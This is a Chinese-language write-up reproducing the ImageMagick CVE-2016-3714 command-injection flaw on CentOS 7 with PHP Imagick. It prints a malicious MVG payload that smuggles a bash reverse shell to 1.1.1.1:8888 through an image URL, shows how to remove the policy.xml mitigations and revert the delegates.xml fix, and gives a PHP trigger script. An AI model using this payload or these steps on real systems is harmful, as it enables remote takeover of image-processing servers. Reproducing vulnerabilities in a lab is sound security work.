ImageMagick 漏洞复现之路

我的环境是centos7 ,php是PHP 5.4.16，ImageMagick是6.7.8-9正好在影响范围之内，但是官方还是对其官网上所有的安装包进行了修复，所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的，
我们看看官方都是怎么修复的，并且还原漏洞现场
漏洞原理在：https://jiji262.github.io/wooyun_articles/drops/CVE-2016-3714%20-%20ImageMagick%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90.html

首先安装ImageMagick：
参考：http://jingyan.baidu.com/article/91f5db1be6ded11c7f05e3d3.html
yum install ImageMagick
yum install ImageMagick-devel
yum install php-pear
yum -y install php-devel
yum install gcc
pecl install imagick （这个之内在php 5.3的版本以上才能安装成功）
 echo extension=imagick.so >> /etc/php.ini  （这个是将ImageMagick加载到php中）
这个时候我们vim test.mvg

内容是：

push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'pop graphic-context

保存，然后

converttest.mvg test.png

发现没有权限

我查看：

/etc/ImageMagick/policy.xml

发现在配置文件里面已经加入了修复配置：

<policymap>  <policy domain="coder" rights="none" pattern="EPHEMERAL" />  <policy domain="coder" rights="none" pattern="URL" />  <policy domain="coder" rights="none" pattern="HTTPS" />  <policy domain="coder" rights="none" pattern="MVG" />  <policy domain="coder" rights="none" pattern="MSL" /></policymap>

我删掉这些

然后再运行一下，依然不成功，我继续查看：/etc/ImageMagick/delegates.xml

查找https

发现：

修复前配置文件的https部分：

<delegatedecode="https" command="&quot;curl&quot; -s -k-o &quot;%o&quot; &quot;https:%M&quot;"/>

修复后：

<delegatedecode="https" command="&quot;curl&quot; -s -k-o &quot;%o&quot; &quot;https:%F&quot;"/>

红色部分就是官方修复的位置

将配置文件修改之后：

converttest.mvg test.png

成功出发漏洞，反弹一个shell回本机

写一个php文件来证明这个漏洞：

<?php$thu= new Imagick();$thu->readImage('test.mvg');$thu->writeImage('KKKK.png');$thu->clear();$thu->destroy();unlink("KKKK.png");?>

用phptest.php来执行一下

成功触发，并且反弹